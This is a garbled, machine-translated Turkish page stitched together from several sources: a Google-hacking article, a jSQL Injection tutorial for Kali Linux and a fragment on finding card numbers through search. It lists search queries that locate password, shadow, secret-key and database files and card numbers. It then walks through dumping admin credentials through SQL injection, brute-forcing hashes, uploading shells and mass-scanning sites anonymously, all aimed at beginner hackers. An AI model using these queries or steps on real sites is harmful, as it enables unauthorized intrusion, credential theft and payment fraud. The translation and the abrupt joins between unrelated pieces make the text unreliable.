• Inurl yorum php kimliği isteniyor. Kali Linux'ta SQL enjeksiyonlarını bulmaya ve bunlardan yararlanmaya yönelik çok işlevli bir araç olan jSQL Enjeksiyonunu kullanma talimatları. jSQL Injection ile kaba zorlama karmaları

    Google ile Hacking

    Alexander Antipov

    Google arama motoru (www.google.com) birçok arama seçeneği sunar. Tüm bu özellikler, ilk kez İnternet kullanıcısı için paha biçilmez bir arama aracıdır ve aynı zamanda sadece bilgisayar korsanları değil, aynı zamanda bilgisayar dışı suçlular ve hatta teröristler de dahil olmak üzere kötü niyetli kişilerin elinde çok daha güçlü bir istila ve yok etme silahıdır.
    (1 haftada 9475 görüntülenme)


    Denis Batrankov
    denisNOSPAMixi.ru

    Dikkat: Bu makale bir eylem kılavuzu değildir. Bu makale siz WEB sunucu yöneticileri için yazılmıştır, böylece güvende olduğunuza dair yanlış duygudan kurtulursunuz ve sonunda bu bilgi edinme yönteminin sinsiliğini anlar ve sitenizi korumaya başlarsınız.

    giriiş

    Örneğin 0,14 saniyede 1670 sayfa buldum!

    2. Başka bir dizi girin, örneğin:

    inurl:"auth_user_file.txt"

    biraz daha az, ancak bu, ücretsiz indirme ve şifreleri tahmin etmek için (aynı John The Ripper'ı kullanarak) zaten yeterli. Aşağıda birkaç örnek daha vereceğim.

    Bu nedenle, Google arama motorunun İnternet sitelerinin çoğunu ziyaret ettiğini ve bunlarda bulunan bilgileri önbelleğe aldığını fark etmeniz gerekir. Önbelleğe alınan bu bilgiler, siteyle doğrudan bağlantı kurmadan site ve sitenin içeriği hakkında bilgi almanıza olanak tanır, yalnızca Google tarafından dahili olarak depolanan bilgileri araştırır. Ayrıca, sitedeki bilgiler artık mevcut değilse, önbellekteki bilgiler yine de korunabilir. Bu yöntem için gereken tek şey, bazı Google anahtar kelimelerini bilmektir. Bu tekniğe Google Hacking denir.

    Google Hacking ile ilgili bilgiler ilk kez 3 yıl önce Bugtruck posta listesinde ortaya çıktı. 2001 yılında bu konu bir Fransız öğrenci tarafından gündeme getirildi. İşte bu mektuba bir bağlantı http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html . Bu tür isteklerin ilk örneklerini verir:

    1) /admin dizini
    2) /şifre dizini
    3) /mail dizini
    4) / +banques +filetype:xls dizini (Fransa için...)
    5) / +passwd dizini
    6)/password.txt dizini

    Bu konu, İnternet'in İngilizce okuma bölümünde oldukça yakın bir zamanda çok ses getirdi: 7 Mayıs 2004'te Johnny Long tarafından yayınlanan bir makaleden sonra. Google Hacking ile ilgili daha eksiksiz bir çalışma için, bu yazarın sitesine gitmenizi tavsiye ederim http://johnny.ihackstuff.com. Bu yazıda, sadece sizi güncel hale getirmek istiyorum.

    Kimler kullanabilir:
    - Gazeteciler, casuslar ve diğer insanların işine burnunu sokmaktan hoşlanan herkes, uzlaşmacı kanıt aramak için bunu kullanabilir.
    - Bilgisayar korsanları, bilgisayar korsanlığı için uygun hedefler arıyor.

    Google nasıl çalışır?

    Sohbete devam etmek için Google sorgularında kullanılan bazı anahtar kelimeleri hatırlatmama izin verin.

    + işaretini kullanarak arama yapın

    Google, kendi görüşüne göre önemsiz kelimeleri aramadan hariç tutar. Örneğin, İngilizce'deki soru sözcükleri, edatlar ve makaleler: örneğin are, of, where. Rusça'da, Google tüm kelimeleri önemli görüyor gibi görünüyor. Kelime aramanın dışında tutulursa, Google bunun hakkında yazar. Google'ın bu kelimeleri içeren sayfaları aramaya başlaması için, kelimeden önce boşluk bırakmadan önlerine + işareti eklemeniz gerekir. Örneğin:

    as + taban

    İşarete göre ara -

    Google, belirli konulara sahip sayfaları hariç tutmak istediğiniz çok sayıda sayfa bulursa, Google'ı yalnızca belirli kelimeleri içermeyen sayfaları aramaya zorlayabilirsiniz. Bunu yapmak için, bu kelimeleri her birinin önüne bir işaret koyarak - kelimenin önünde boşluk bırakmadan - belirtmeniz gerekir. Örneğin:

    balık tutma - votka

    ~ işareti ile arama

    Yalnızca belirtilen kelimeye değil, aynı zamanda eşanlamlılarına da bakmak isteyebilirsiniz. Bunu yapmak için, kelimeden önce ~ sembolünü kullanın.

    Çift tırnak kullanarak tam bir ifade bulma

    Google, sorgu dizesine yazdığınız kelimelerin tüm oluşumlarını her sayfada arar ve kelimelerin göreli konumunu umursamaz, asıl önemli olan, belirtilen tüm kelimelerin aynı anda sayfada olmasıdır (bu, varsayılan eylemdir). Tam ifadeyi bulmak için, onu tırnak içine almanız gerekir. Örneğin:

    "kitap ayracı"

    Belirtilen kelimelerden en az birine sahip olmak için mantıksal işlemi açıkça belirtmeniz gerekir: VEYA. Örneğin:

    kitap güvenliği VEYA koruması

    Ayrıca, herhangi bir kelimeyi belirtmek için arama dizesinde * işaretini kullanabilirsiniz. Herhangi bir karakteri temsil etmek için.

    Ek işleçlerle sözcük bulma

    Arama dizesinde şu biçimde belirtilen arama işleçleri vardır:

    operatör:arama_terimi

    Kolonun yanındaki boşluklara gerek yoktur. İki noktadan sonra boşluk eklerseniz bir hata mesajı görürsünüz ve ondan önce Google bunları normal bir arama dizesi olarak kullanır.
    Ek arama operatörleri grupları vardır: diller - sonucu hangi dilde görmek istediğinizi belirtin, tarih - son üç, altı veya 12 ay için sonuçları sınırlayın, oluşumlar - dizeyi belgede nerede aramanız gerektiğini belirtin: her yerde, başlıkta, URL'de, etki alanlarında - belirtilen siteyi arayın veya tam tersi, onu aramadan hariç tutun, güvenli arama - belirtilen türde bilgileri içeren siteleri engelleyin ve bunları arama sonuçları sayfalarından kaldırın.
    Bununla birlikte, bazı operatörlerin ek bir parametreye ihtiyacı yoktur, örneğin, "cache:www.google.com" sorgusu tam teşekküllü bir arama dizesi olarak adlandırılabilir ve bunun tersine bazı anahtar kelimeler bir arama kelimesinin varlığını gerektirir, örneğin " site:www.google.com yardım ". Konumuz ışığında aşağıdaki operatörlere bir göz atalım:

    Şebeke

    Tanım

    Ek bir parametre gerekiyor mu?

    yalnızca search_term'de belirtilen siteyi ara

    yalnızca search_term türündeki belgelerde ara

    başlığında search_term içeren sayfaları bul

    başlığında search_term kelimelerinin tamamını içeren sayfaları bul

    adreslerinde search_term kelimesini içeren sayfaları bulun

    adreslerinde search_term kelimelerinin tümünü içeren sayfaları bul

    site: operatörü, aramayı yalnızca belirtilen siteyle sınırlar ve yalnızca alan adını değil, IP adresini de belirtebilirsiniz. Örneğin şunu girin:

    filetype: ifadesi, aramaları belirli bir türdeki dosyalarla kısıtlar. Örneğin:

    Bu makalenin tarihi itibariyle, Google 13 farklı dosya biçiminde arama yapabilir:

    • Adobe Taşınabilir Belge Formatı (pdf)
    • Adobe PostScript (ps)
    • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
    • Lotus Word Pro (lwp)
    • MacWrite(mw)
    • Microsoft Excel (xls)
    • Microsoft PowerPoint (ppt)
    • Microsoft Word (belge)
    • Microsoft İşleri (wks, wps, wdb)
    • Microsoft Yazma (yazma)
    • Zengin Metin Biçimi (rtf)
    • Şok Dalgası Flaşı (swf)
    • Metin (cevap, txt)

    link: belirtilen sayfaya işaret eden tüm sayfaları gösterir.
    İnternette kaç yerin hakkınızda bilgi sahibi olduğunu görmek her zaman ilginç olmalı. Deneriz:

    cache: deyimi, sitenin Google tarafından önbelleğe alınan sürümünü, Google'ın bu sayfayı en son ziyaret ettiği zamanki haliyle gösterir. Sık sık değişen herhangi bir siteyi alır ve şunlara bakarız:

    intitle: operatörü belirtilen kelimeyi sayfanın başlığında arar. allintitle: operatörü bir uzantıdır - sayfa başlığında belirtilen birden çok kelimenin tümünü arar. Karşılaştırmak:

    intitle:mars'a uçuş
    intitle:flight intitle:intitle:mars'ta
    allintitle:mars'a uçuş

    inurl operatörü: Google'ın belirtilen dizeyi içeren tüm sayfaları URL'de göstermesine neden olur. allinurl: Bir URL'deki tüm kelimeleri arar. Örneğin:

    allinurl:acid_stat_alerts.php

    Bu komut özellikle SNORT'a sahip olmayanlar için kullanışlıdır - en azından gerçek bir sistemde nasıl çalıştığını görebilirler.

    Google Hack Yöntemleri

    Böylece, yukarıdaki operatörlerin ve anahtar kelimelerin bir kombinasyonunu kullanarak herkesin gerekli bilgileri toplayabileceğini ve güvenlik açıklarını arayabileceğini öğrendik. Bu tekniklere genellikle Google Hacking denir.

    Site Haritası

    Google'ın sitede bulduğu tüm bağlantıları görmek için site: deyimini kullanabilirsiniz. Genellikle, komut dosyaları tarafından dinamik olarak oluşturulan sayfalar parametreler kullanılarak dizine eklenmez, bu nedenle bazı siteler ISAPI filtreleri kullanır, böylece bağlantılar /article.asp?num=10&dst=5 biçiminde değil, eğik çizgi /article/abc/num/10/dst/5 şeklinde olur. Bu, sitenin genel olarak arama motorları tarafından indekslenmesini sağlamak için yapılır.

    Hadi deneyelim:

    site: www.whitehouse.gov whitehouse

    Google, bir sitedeki her sayfanın beyaz ev kelimesini içerdiğini düşünür. Tüm sayfaları almak için kullandığımız şey bu.
    Basitleştirilmiş bir versiyonu da var:

    site: whitehouse.gov

    Ve en iyi yanı, whitehouse.gov'daki yoldaşların sitelerinin yapısına baktığımızı ve hatta Google'ın kendisi için indirdiği önbelleğe alınmış sayfalara baktığımızı bile bilmemeleri. Bu, sitelerin yapısını incelemek ve içeriği şu an için fark edilmeden görüntülemek için kullanılabilir.

    Dizinlerdeki dosyaları listeleme

    WEB sunucuları, normal HTML sayfaları yerine sunucu dizin listelerini görüntüleyebilir. Bu genellikle kullanıcıları belirli dosyaları seçmeye ve indirmeye zorlamak için yapılır. Ancak çoğu durumda yöneticilerin bir dizinin içeriğini gösterme gibi bir niyeti yoktur. Bunun nedeni, sunucunun yanlış yapılandırılması veya dizinde bir ana sayfa olmamasıdır. Sonuç olarak, bilgisayar korsanının dizinde ilginç bir şey bulma ve onu kendi amaçları için kullanma şansı vardır. Bu tür tüm sayfaları bulmak için, hepsinin başlığında şu sözcükleri içerdiğine dikkat etmek yeterlidir: index of. Ancak kelime dizini sadece bu tür sayfaları içermediğinden, sorguyu hassaslaştırmamız ve sayfanın kendisindeki anahtar kelimeleri dikkate almamız gerekir, bu nedenle aşağıdaki gibi sorgular:

    intitle: üst dizinin index.of
    intitle:index.of ad boyutu

    Çoğu dizin listesi kasıtlı olduğundan, ilk seferde yanlış yerleştirilmiş listeleri bulmakta zorlanabilirsiniz. Ancak en azından aşağıda açıklandığı gibi WEB sunucusu sürümünü belirlemek için listeleri kullanabileceksiniz.

    WEB sunucusu sürümünü alma.

    WEB sunucusu sürümünü bilmek, herhangi bir bilgisayar korsanı saldırısına başlamadan önce her zaman yardımcı olur. Yine Google sayesinde bu bilgiyi bir sunucuya bağlanmadan almak mümkün. Dizin listesine dikkatlice bakarsanız, WEB sunucusunun adının ve sürümünün burada görüntülendiğini görebilirsiniz.

    Apache1.3.29 - trf296.free.fr adresindeki ProXad Sunucusu Bağlantı Noktası 80

    Deneyimli bir yönetici bu bilgileri değiştirebilir, ancak kural olarak doğrudur. Bu nedenle, bu bilgiyi almak için bir istek göndermek yeterlidir:

    intitle:index.of server.at

    Belirli bir sunucu için bilgi almak üzere isteği hassaslaştırırız:

    intitle:index.of server.at site:ibm.com

    Veya tam tersi, sunucunun belirli bir sürümünde çalışan sunucuları arıyoruz:

    intitle:index.of Apache/2.0.40 Sunucusu

    Bu teknik, bir bilgisayar korsanı tarafından bir kurban bulmak için kullanılabilir. Örneğin, WEB sunucusunun belirli bir sürümü için bir istismara sahipse, onu bulabilir ve mevcut istismarı deneyebilir.

    WEB sunucusunun yeni bir sürümünü kurarken varsayılan olarak yüklenen sayfalara bakarak da sunucu sürümünü alabilirsiniz. Örneğin, Apache 1.2.6 test sayfasını görmek için şunu yazmanız yeterlidir:

    intitle:Test.Page.for.Apache it.çalıştı!

    Ayrıca, bazı işletim sistemleri kurulum sırasında WEB sunucusunu hemen kurar ve başlatır. Ancak bazı kullanıcılar bunun farkında bile değil. Doğal olarak, birinin varsayılan sayfayı silmediğini görürseniz, bilgisayarın herhangi bir yapılandırmaya tabi tutulmadığını ve muhtemelen saldırılara karşı savunmasız olduğunu varsaymak mantıklıdır.

    IIS 5.0 sayfalarını aramayı deneyin

    allintitle:Windows 2000 İnternet Hizmetlerine Hoş Geldiniz

    IIS durumunda, yalnızca sunucunun sürümünü değil, Windows sürümünü ve Hizmet Paketini de belirleyebilirsiniz.

    WEB sunucusunun sürümünü belirlemenin başka bir yolu, varsayılan olarak siteye yüklenebilecek kılavuzlara (yardım sayfaları) ve örneklere bakmaktır. Bilgisayar korsanları, siteye ayrıcalıklı erişim elde etmek için bu bileşenleri kullanmanın epeyce yolunu bulmuşlardır. Bu yüzden bu bileşenleri üretim sahasından çıkarmanız gerekiyor. Bu bileşenlerin varlığıyla sunucu türü ve sürümü hakkında bilgi alabileceğiniz gerçeğinden bahsetmiyorum bile. Örneğin, apache kılavuzunu bulalım:

    inurl:manuel apache yönergeleri modülleri

    Google'ı bir CGI tarayıcı olarak kullanmak.

    CGI tarayıcı veya WEB tarayıcı, kurbanın sunucusundaki güvenlik açığı bulunan komut dosyalarını ve programları aramak için kullanılan bir yardımcı programdır. Bu yardımcı programların ne arayacaklarını bilmeleri gerekir, bunun için savunmasız dosyaların tam bir listesine sahiptirler, örneğin:

    /cgi-bin/cgiemail/uargg.txt
    /random_banner/index.cgi
    /random_banner/index.cgi
    /cgi-bin/mailview.cgi
    /cgi-bin/maillist.cgi
    /cgi-bin/userreg.cgi

    /iissamples/ISSamples/SQLQHit.asp
    /SiteServer/admin/findvserver.asp
    /scripts/cphost.dll
    /cgi-bin/finger.cgi

    Bu dosyaların her birini Google'ı kullanarak, ayrıca arama çubuğundaki dosya adıyla birlikte index of veya inurl kelimelerini kullanarak bulabiliriz: savunmasız komut dosyalarına sahip siteleri bulabiliriz, örneğin:

    allinurl:/random_banner/index.cgi

    Ek bilgiye sahip bir bilgisayar korsanı, bir komut dosyası güvenlik açığından yararlanabilir ve bu güvenlik açığını, komut dosyasını sunucuda depolanan herhangi bir dosyaya hizmet vermeye zorlamak için kullanabilir. Örneğin bir parola dosyası.

    Kendinizi Google aracılığıyla saldırıya uğramaktan nasıl korursunuz? 1. Önemli verileri WEB sunucusuna yüklemeyin.

    Verileri geçici olarak göndermiş olsanız bile, onu unutabilirsiniz veya birisinin bu verileri siz silmeden önce bulup alması için zamanı olacaktır. yapma Hırsızlığa karşı koruyan verileri aktarmanın başka birçok yolu vardır.

    2. Sitenizi kontrol edin.

    Sitenizi araştırmak için açıklanan yöntemleri kullanın. http://johnny.ihackstuff.com sitesinde görünen yeni yöntemler için sitenizi düzenli olarak kontrol edin. İşlemlerinizi otomatikleştirmek istiyorsanız Google'dan özel izin almanız gerektiğini unutmayın. dikkatli okursan http://www.google.com/terms_of_service.html, ardından şu ifadeyi göreceksiniz: Google'ın önceden açık izni olmadan Google'ın sistemine hiçbir türden otomatik sorgu gönderemezsiniz.

    3. Sitenizi veya bir bölümünü dizine eklemek için Google'a ihtiyacınız olmayabilir.

    Google, sitenize giden bir bağlantıyı veya bunun bir bölümünü veritabanından kaldırmanıza ve ayrıca önbellekten sayfaları kaldırmanıza izin verir. Ek olarak, sitenizde görsel aramayı yasaklayabilir, kısa sayfa parçalarının arama sonuçlarında görüntülenmesini yasaklayabilirsiniz. Bir siteyi silmek için tüm olasılıklar sayfada açıklanmıştır. http://www.google.com/remove.html. Bunu yapmak için, bu sitenin gerçekten sahibi olduğunuzu doğrulamanız veya sayfaya etiketler eklemeniz veya

    4. robots.txt'yi kullanın

    Arama motorlarının sitenin kök dizinindeki robots.txt dosyasına baktığı ve Disallow kelimesiyle işaretlenmiş bölümleri dizine eklemediği bilinmektedir. Bunu, sitenin bir bölümünün dizine eklenmesini önlemek için kullanabilirsiniz. Örneğin, tüm siteyi dizine eklemekten kaçınmak için iki satır içeren bir robots.txt dosyası oluşturun:

    Kullanıcı aracısı: *
    izin verme: /

    başka ne olur

    Hayat size bal gibi görünmesin diye, sonunda yukarıdaki yöntemleri kullanarak komut dosyalarında ve WEB sunucularında delikler arayan insanları takip eden siteler olduğunu söyleyeceğim. Böyle bir sayfaya örnek olarak

    Başvuru.

    biraz tatlı Aşağıdakilerden birini kendiniz deneyin:

    1. #mysql dökümü filetype:sql - mySQL veritabanı dökümlerini arayın
    2. Ana Bilgisayar Güvenlik Açığı Özet Raporu - size diğer kişilerin hangi güvenlik açıklarını bulduğunu gösterecek
    3. inurl:main.php üzerinde çalışan phpMyAdmin - bu, phpmyadmin paneli aracılığıyla kontrolü kapatmaya zorlar
    4. Gizli dağıtım için değil
    5. İstek Ayrıntıları Kontrol Ağacı Sunucu Değişkenleri
    6. Çocuk modunda çalıştırma
    7. Bu rapor WebLog tarafından oluşturulmuştur.
    8. intitle:index.of cgiirc.config
    9. filetype:conf inurl:firewall -intitle:cvs - belki birinin güvenlik duvarı yapılandırma dosyalarına ihtiyacı vardır? :)
    10. intitle:index.of Finance.xls - hmm...
    11. intitle: dbconvert.exe sohbet dizini - icq sohbet günlükleri
    12. intext:Tobias Oetiker trafik analizi
    13. intitle:Webalizer Tarafından Oluşturulan Kullanım İstatistikleri
    14. intitle:gelişmiş web istatistiklerinin istatistikleri
    15. intitle:index.of ws_ftp.ini - ws ftp yapılandırması
    16. inurl:ipsec.secrets paylaşılan sırları tutar - gizli anahtar - iyi keşif
    17. inurl:main.php phpMyAdmin'e Hoş Geldiniz
    18. inurl:server-info Apache Sunucu Bilgileri
    19. site:edu yönetici notları
    20. ORA-00921: SQL komutunun beklenmeyen sonu - yolları al
    21. intitle:index.of trillian.ini
    22. intitle: pwd.db dizini
    23. intitle:index.ofpeople.lst
    24. intitle:index.of master.passwd
    25.inurl:passlist.txt
    26. intitle: .mysql_history Dizini
    27. intitle:intext:globals.inc dizini
    28. intitle:admin.ofadmins.pwd
    29. intitle:Index.of etc gölgesi
    30. intitle:index.of secring.pgp
    31. inurl:config.php dbuname dbpass
    32. inurl:filetype gerçekleştir:ini

  • "Google'ı hacklemek"
  • Eğitim merkezi "Informzashchita" http://www.itsecurity.ru - bilgi güvenliği eğitimi alanında lider bir uzman merkez (Moskova Eğitim Komitesi Lisansı No. 015470, Devlet akreditasyonu No. 004251). İnternet Güvenlik Sistemleri ve Clearswift'in Rusya ve BDT ülkelerindeki tek yetkili eğitim merkezi. Microsoft yetkili eğitim merkezi (Güvenlik uzmanlığı). Eğitim programları, Rusya Devlet Teknik Komisyonu FSB (FAPSI) ile koordine edilmektedir. Eğitim sertifikaları ve ileri eğitimle ilgili devlet belgeleri.

    SoftKey, alıcılar, geliştiriciler, satıcılar ve bağlı ortaklar için benzersiz bir hizmettir. Ayrıca bu, müşterilere geniş bir yelpaze, birçok ödeme yöntemi, hızlı (genellikle anında) sipariş işleme, kişisel bölümde sipariş yerine getirme sürecini izleme, mağaza ve yazılım üreticilerinden çeşitli indirimler sunan Rusya, Ukrayna ve Kazakistan'daki en iyi çevrimiçi yazılım mağazalarından biridir.

    İndirilen dosyayı çift tıklayarak çalıştırın (sanal makinenizin olması gerekir).

    3. Siteyi SQL enjeksiyonları için kontrol ederken anonimlik
    Kali Linux'ta Tor ve Privoxy Kurulumu

    [Bölüm geliştiriliyor]

    Windows'ta Tor ve Privoxy Kurulumu

    [Bölüm geliştiriliyor]

    jSQL Enjeksiyon proxy ayarları

    [Bölüm geliştiriliyor]

    4. Siteyi jSQL Enjeksiyonu ile SQL enjeksiyonu için kontrol etme

    Programla çalışmak son derece basittir. Sadece site adresini girin ve ENTER'a basın.

    Aşağıdaki ekran görüntüsü, sitenin aynı anda üç tür SQL enjeksiyonuna karşı savunmasız olduğunu göstermektedir (bunlarla ilgili bilgiler sağ alt köşede belirtilmiştir). Enjeksiyonların adlarına tıklayarak kullanılan yöntemi değiştirebilirsiniz:

    Ayrıca, mevcut veritabanlarını zaten görüntüledik.

    Her tablonun içeriğini görebilirsiniz:

    Genellikle tabloların en ilginç kısmı yönetici kimlik bilgileridir.

    Şanslıysanız ve yöneticinin verilerini bulduysanız, sevinmek için henüz çok erken. Ayrıca, bu verileri nereye gireceğiniz yönetici panelini bulmanız gerekir.

    5. jSQL Injection ile yöneticileri arayın

    Bunu yapmak için bir sonraki sekmeye gidin. Burada olası adreslerin bir listesi ile karşılaşıyoruz. Kontrol etmek için bir veya daha fazla sayfa seçebilirsiniz:

    Kolaylık, başka programları kullanmanıza gerek olmamasıdır.

    Ne yazık ki, şifreleri açık metin olarak saklayan çok fazla dikkatsiz programcı yok. Sıklıkla şifre dizisinde şöyle bir şey görürüz:

    8743b52063cd84097a65d1633f5c74f5

    Bu bir hash. Brute force ile deşifre edebilirsiniz. Ve… jSQL Injection yerleşik bir brute-forcer'a sahiptir.

    6. jSQL Injection ile kaba zorlama karmaları

    Şüphesiz kolaylık, başka programlar aramanıza gerek olmamasıdır. En popüler karmaların çoğu için destek var.

    Bu en iyi seçenek değil. Karmaların deşifre edilmesinde guru olmak için Rusça "" kitabı tavsiye edilir.

    Ancak, elbette, elinizde başka bir program olmadığında veya çalışmak için zaman olmadığında, yerleşik kaba kuvvet işlevine sahip jSQL Injection kullanışlı olacaktır.

    Ayarlar vardır: Parolada hangi karakterlerin yer alacağını, parola uzunluk aralığını ayarlayabilirsiniz.

    7. SQL enjeksiyon tespitinden sonra dosya işlemleri

    Veritabanlarıyla yapılan işlemlere ek olarak - bunları okuma ve değiştirme, SQL enjeksiyonları algılanırsa, aşağıdaki dosya işlemleri gerçekleştirilebilir:

    • sunucudaki dosyaları okumak
    • sunucuya yeni dosyalar yükleniyor
    • kabukları sunucuya yüklemek

    Ve tüm bunlar jSQL Injection'da uygulanmaktadır!

    Sınırlamalar vardır - SQL sunucusunun dosya ayrıcalıkları olmalıdır. Makul sistem yöneticileri ile devre dışı bırakılırlar ve dosya sistemine erişim sağlanamaz.

    Dosya ayrıcalıklarının varlığını kontrol etmek yeterince kolaydır. Sekmelerden birine gidin (dosyaları okumak, kabuk oluşturmak, yeni bir dosya yüklemek) ve belirtilen işlemlerden birini gerçekleştirmeyi deneyin.

    Bir başka çok önemli not - çalışacağımız dosyanın tam yolunu bilmemiz gerekiyor - aksi takdirde hiçbir şey çalışmayacaktır.

    Aşağıdaki ekran görüntüsüne bakın:

    Bir dosya üzerinde herhangi bir çalışma girişimi şu şekilde yanıtlanır: DOSYA ayrıcalığı yok (dosya ayrıcalığı yok). Ve burada hiçbir şey yapılamaz.

    Bunun yerine başka bir hatanız varsa:

    [dizin_adı] içine yazma sorunu

    Bu, dosyayı yazmak istediğiniz mutlak yolu yanlış belirttiğiniz anlamına gelir.

    Mutlak bir yol varsaymak için, en azından sunucunun üzerinde çalıştığı işletim sistemini bilmek gerekir. Bunu yapmak için Ağ sekmesine geçin.

    Böyle bir giriş (Win64 dizisi), Windows işletim sistemi ile uğraştığımızı varsaymamız için bize neden verir:

    Canlı Tutma: timeout=5, max=99 Sunucu: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Bağlantı: Canlı Tutma Yöntemi: HTTP/1.1 200 Tamam İçerik Uzunluğu: 353 Tarih: Cum, 11 Aralık 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 İçerik Türü: text/html; karakter kümesi=UTF-8

    Burada bazı Unix'lerimiz var (*BSD, Linux):

    Aktarım Kodlaması: yığın Tarih: Cum, 11 Aralık 2015 11:57:02 GMT Yöntemi: HTTP/1.1 200 Tamam Canlı Tut: timeout=3, max=100 Bağlantı: canlı tutma İçerik Türü: text/html X-Powered-By: PHP/5.3.29 Sunucu: Apache/2.2.31 (Unix)

    Ve burada CentOS'umuz var:

    Yöntem: HTTP/1.1 200 OK Süre Sonu: 19 Kasım 1981 Per, 08:52:00 GMT Tanımlama Bilgisi Ayarlama: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Bağlantı: canlı kalma X-Cache-Lookup: t1.hoster.ru:6666'dan MISS Sunucu: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: t1.hoster.ru'dan MISS Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Tarih: Cuma , 11 Aralık 2015 12:08:54 GMT Transfer-Kodlama: parçalı İçerik-Türü: text/html; karakter kümesi=WINDOWS-1251

    Windows'ta tipik bir site klasörü C:\Server\data\htdocs\ şeklindedir. Ama aslında, birisi Windows'ta bir sunucu yapmayı "düşündüyse", o zaman büyük olasılıkla bu kişi ayrıcalıklar hakkında hiçbir şey duymamıştır. Bu nedenle, doğrudan C: / Windows / dizininden denemeye başlamalısınız:

    Gördüğünüz gibi, ilk seferinde her şey mükemmel gitti.

    Ancak jSQL Injection kabukları şüphelerimi artırıyor. Dosya ayrıcalıklarınız varsa, web arayüzü ile bir şeyler yükleyebilirsiniz.

    8. SQL enjeksiyonları için toplu kontrol siteleri

    Ve hatta jSQL Injection bile bu özelliğe sahiptir. Her şey son derece basit - bir site listesi yükleyin (bir dosyadan içe aktarılabilir), kontrol etmek istediklerinizi seçin ve işlemi başlatmak için uygun düğmeyi tıklayın.

    jSQL Enjeksiyonu ile Çıktı

    jSQL Injection, sitelerde bulunan SQL enjeksiyonlarını bulup kullanmak için iyi ve güçlü bir araçtır. Şüphesiz avantajları: kullanım kolaylığı, yerleşik ilgili işlevler. jSQL Injection, web sitelerini analiz ederken yeni başlayanların en iyi arkadaşı olabilir.

    Eksiklikler arasında, veritabanlarını düzenlemenin imkansızlığına dikkat çekerdim (en azından bu işlevi bulamadım). Grafik arayüze sahip tüm araçlarda olduğu gibi, komut dosyalarında kullanılamaması bu programın dezavantajlarına bağlanabilir. Bununla birlikte, toplu kontrol sitelerinin yerleşik işlevi sayesinde bu programda bir miktar otomasyon da mümkündür.

    jSQL Injection, sqlmap'ten çok daha kullanışlıdır. Ancak sqlmap, daha fazla türde SQL enjeksiyonunu destekler, dosya güvenlik duvarı seçeneklerine ve diğer bazı özelliklere sahiptir.

    Alt satır: jSQL Injection, yeni başlayan bir bilgisayar korsanının en iyi arkadaşıdır.

    Bu program için şu sayfadaki Kali Linux Ansiklopedisi'nde yardım bulabilirsiniz: http://kali.tools/?p=706

    Özel verilerin alınması her zaman bilgisayar korsanlığı anlamına gelmez - bazen kamu malı olarak yayınlanır. Google ayarlarını bilmek ve biraz ustalık, kredi kartı numaralarından FBI belgelerine kadar pek çok ilginç şey bulmanızı sağlayacaktır.

    UYARI Tüm bilgiler yalnızca bilgilendirme amaçlıdır. Bu makaledeki materyallerin neden olabileceği olası zararlardan ne editörler ne de yazar sorumlu değildir.

    Bugün her şey internete bağlı ve erişimi kısıtlamayı pek önemsemiyor. Bu nedenle, birçok özel veri arama motorlarının avı haline gelir. Örümcek robotlar artık web sayfalarıyla sınırlı değil, Web'de bulunan tüm içeriği indeksliyor ve veritabanlarına sürekli olarak gizli bilgiler ekliyor. Bu sırları öğrenmek kolaydır - sadece onlar hakkında nasıl soru soracağınızı bilmeniz gerekir.

    dosyalar aranıyor

    Becerikli ellerde Google, kişisel bilgiler ve resmi kullanıma yönelik dosyalar gibi Web'de kötü olan her şeyi hızla bulacaktır. Genellikle halının altındaki bir anahtar gibi gizlenirler: gerçek erişim kısıtlamaları yoktur, veriler yalnızca sitenin arkasında, bağlantıların yönlendirmediği yerde bulunur. Standart Google web arayüzü, yalnızca temel gelişmiş arama ayarları sağlar, ancak bunlar bile yeterli olacaktır.

    Google aramalarını belirli bir türdeki dosyalarla sınırlamak için kullanabileceğiniz iki operatör vardır: filetype ve ext . İlki, arama motorunun dosya başlığı tarafından belirlediği biçimi, ikincisi ise dahili içeriğinden bağımsız olarak dosya uzantısını ayarlar. Her iki durumda da arama yaparken yalnızca uzantıyı belirtmeniz gerekir. Başlangıçta, ext operatörü, dosya için belirli bir biçim özelliğinin olmadığı durumlarda (örneğin, her şeyi içerebilen ini ve cfg yapılandırma dosyalarını aramak için) kullanmak için uygundu. Artık Google'ın algoritmaları değişti ve operatörler arasında gözle görülür bir fark yok - sonuçlar çoğu durumda aynı.


    Çıktıyı filtreleme

    Varsayılan olarak, Google, indekslenen sayfalardaki tüm dosyalarda girilen sözcükleri ve genel olarak karakterleri arar. Arama kapsamını üst düzey etki alanına, belirli bir siteye veya dosyaların kendisinde istenen sıranın konumuna göre sınırlayabilirsiniz. İlk iki seçenek için, site ifadesi kullanılır, ardından etki alanı veya seçilen sitenin adı gelir. Üçüncü durumda, bir dizi işleç, hizmet alanlarında ve meta verilerde bilgi aramanıza izin verir. Örneğin, allinurl belirtileni bağlantıların gövdesinde bulacaktır, allinanchor - etiketle sağlanan metinde , allintitle - sayfa başlıklarında, allintext - sayfaların gövdesinde.

    Her işleç için daha kısa bir ada sahip daha hafif bir sürüm vardır (tümü ön eki olmadan). Aradaki fark, allinurl'ün tüm kelimelerle bağlantılar bulması, inurl'nin ise yalnızca ilk kelimelerle bağlantılar bulması. Sorgudaki ikinci ve sonraki kelimeler web sayfalarının herhangi bir yerinde görünebilir. inurl işleci aynı zamanda anlam bakımından benzer başka bir işleçten farklıdır - site . İlki ayrıca, bilinen güvenlik açıklarına sahip bileşenleri bulmak için yaygın olarak kullanılan, istenen belgeye (örneğin, /cgi-bin/) giden bağlantıda herhangi bir karakter dizisini bulmanızı sağlar.

    Pratikte deneyelim. Allintext filtresini alıyoruz ve sorgunun, yalnızca iki yıl sonra (veya sahipleri herkesi arka arkaya beslemekten yorulduğunda) sona erecek olan kredi kartı numaralarının ve doğrulama kodlarının bir listesini döndürmesini sağlıyoruz.

    Allintext: kart numarası son kullanma tarihi /2017 cvv

